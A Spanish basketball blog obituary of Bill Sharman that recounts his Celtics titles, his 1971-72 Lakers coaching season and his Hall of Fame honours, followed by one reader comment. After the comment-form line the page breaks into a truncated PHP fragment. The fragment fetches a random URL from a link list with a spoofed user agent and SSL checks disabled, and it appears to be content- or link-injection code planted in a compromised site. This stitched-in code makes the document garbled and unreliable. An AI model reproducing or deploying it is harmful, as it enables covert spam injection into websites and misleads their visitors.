In memoriam: Bill Sharman

28 de October de 2013 por TheDeerHunter

El pasado viernes falleció a los 87 años uno de los más grandes pioneros de la liga, William Walton Sharman, Bill Sharman. Una figura única en la historia, capaz de contribuir a la grandeza de las dos mayores franquicias de la NBA. Uno de los tres hombres que han sido elegidos doblemente “hall of famers”, como jugador y como entrenador (los otros son John Wooden y Lenny Wilkens). Uno de los 50 mejores jugadores de todos los tiempos (lista oficial) y el único que ha sido elegido “Coach of the Year” en las 3 ligas profesionales americanas (ABL, ABA y NBA). Fue clave en tres de los más grandes equipos de todos los tiempos y ganó 4 anillos como jugador, 1 como técnico y 3 más como ejecutivo. Curiosamente también es uno de los grandes desconocidos para el público en general y para este blog en particular.

Sharman era una especie de superhombre. Jugó profesionalmente al baloncesto y al béisbol durante 5 años. Fue elegido en segunda ronda por los Washington Capitols en 1950 pero cuando desaparecieron al año siguiente, Auerbach logró llevárselo con él a los Celtics. Allí formó uno de los backcourts más temibles de la historia junto a Bob Cousy y ganó los 4 primeros anillos de la franquicia antes de retirarse en 1961. Fue uno de los primeros hombres de perímetro capaz de anotar por encima del 40% en tiro y  uno de los mejores lanzadores de tiros libres de la historia con su estilo tan personal, liderando la clasificación en 7 ocasiones, 5 de ellas consecutivas. En 11 años de carrera, fue 8 veces all-star (con el MVP de 1955), 4 veces miembro del quinteto ideal y 3 más del segundo.

Como entrenador Sharman será recordado por dirigir a los Lakers en la 1971-72, el mítico equipo de las 33 victorias consecutivas, récord de victorias de la regular durante muchos años y a la postre campeones. Posteriormente sería partícipe desde los despachos del diseño de la dinastía de Magic, Jabbar y compañía… Menudo currículum.

En definitiva, una leyenda que quizás no hayamos sido capaces de valorar lo suficiente. Descanse en paz.

Comenta

Un comentario a esta entrada

  1. Ruxixón dice:
    #1

    A mí me sonaba el nombre,que era un buen jugador y que jugó en los C’s de Auerbach pero más allá,nada más.Lamentablemente hay una gran lista de jugadores de los que la mayoría apenas sabemos nada y Sharman entra de ese grupo,vaya historial.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>